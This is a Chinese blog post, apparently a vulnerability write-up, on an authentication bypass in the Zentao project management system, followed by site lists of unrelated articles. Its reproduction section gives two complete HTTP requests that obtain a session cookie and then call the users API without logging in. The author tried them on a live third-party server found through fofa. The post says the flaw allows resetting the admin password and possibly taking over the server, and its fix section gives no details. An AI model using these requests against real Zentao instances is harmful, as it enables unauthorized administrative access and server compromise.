禅道项目管理系统身份认证绕过漏洞

禅道项目管理系统身份认证绕过漏洞

1.漏洞描述

禅道项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,完整覆盖了研发项目管理的核心流程。

禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器

影响版本

16.x <= 禅道项目管理系统< 18.12(开源版)

6.x <= 禅道项目管理系统< 8.12(企业版)

3.x <= 禅道项目管理系统< 4.12(旗舰版)

2.漏洞复现

环境在fofa上找了一个 禅道项目管理系统

首先获取cookie。

GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=fkazcfyqgknhqdkbpttl&branch=qkkcluybdvfxqngbemmn HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Cache-Control: no-cache

在这里插入图片描述

带cookie访问

GET /api.php/v1/users HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: zentaosid=u7i38b0judkg2rgjgqcv7lh312

在这里插入图片描述

出现截图字段:error: no company-browse priv 证明漏洞存在

3.漏洞修复

目前官方已有可更新版本,建议受影响的用户尽快升级至安全版本:

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-28 02:12:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-28 02:12:02       100 阅读
  3. 在Django里面运行非项目文件

    2024-04-28 02:12:02       82 阅读
  4. Python语言-面向对象

    2024-04-28 02:12:02       91 阅读

热门阅读

  1. 【华为OD机试】处理器问题

    2024-04-28 02:12:02       28 阅读
  2. 剑指offer--和为s的数字

    2024-04-28 02:12:02       34 阅读
  3. myql 基础学习目录

    2024-04-28 02:12:02       36 阅读
  4. 文献摘录_干旱

    2024-04-28 02:12:02       31 阅读
  5. ESBMC代码阅读笔记

    2024-04-28 02:12:02       25 阅读
  6. W801学习笔记十三:掌机系统——系统基础组件

    2024-04-28 02:12:02       26 阅读
  7. MIT6.824|课程前置知识

    2024-04-28 02:12:02       36 阅读
  8. windows SDK编程 --- 消息之键盘消息(4)

    2024-04-28 02:12:02       27 阅读
  9. MySQL 按指定字段自定义列表排序

    2024-04-28 02:12:02       33 阅读
  10. phpstudy-Ubuntu面板(小皮面板)

    2024-04-28 02:12:02       37 阅读